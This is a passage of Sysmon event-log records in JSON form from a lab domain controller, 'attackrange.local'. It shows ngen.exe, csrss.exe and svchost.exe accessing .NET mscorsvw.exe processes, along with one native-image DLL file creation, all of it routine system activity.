C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.529","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-001069F20F00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8636,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.529\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-001069F20F00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.529","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-001069F20F00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8637,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-001069F20F00}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-001069F20F00}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8638,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.576\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-0010B9F50F00}\r\nTargetProcessId: 5104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.576","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-0010B9F50F00}","TargetProcessId":"5104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8639,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.576\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-0010B9F50F00}\r\nTargetProcessId: 5104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.576","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-0010B9F50F00}","TargetProcessId":"5104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8640,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.576\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-0010B9F50F00}\r\nTargetProcessId: 5104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.576","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-0010B9F50F00}","TargetProcessId":"5104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8641,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:37.638\r\nProcessGuid: {E2A3D6B1-138D-5F25-0000-0010B9F50F00}\r\nProcessId: 5104\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13f0-0\\System.Web.ApplicationServices.dll\r\nCreationUtcTime: 2020-08-01 07:02:37.638","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:37.638","ProcessGuid":"{E2A3D6B1-138D-5F25-0000-0010B9F50F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13f0-0\\System.Web.ApplicationServices.dll","CreationUtcTime":"2020-08-01 07:02:37.638","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8642,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.670\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-00106FF90F00}\r\nTargetProcessId: 4828\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.670","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-00106FF90F00}","TargetProcessId":"4828","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8643,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:37.670\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-138D-5F25-0000-00106FF90F00}\r\nTargetProcessId: 4828\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:37.670","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-138D-5F25-0000-00106FF90F00}","TargetProcessId":"4828","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
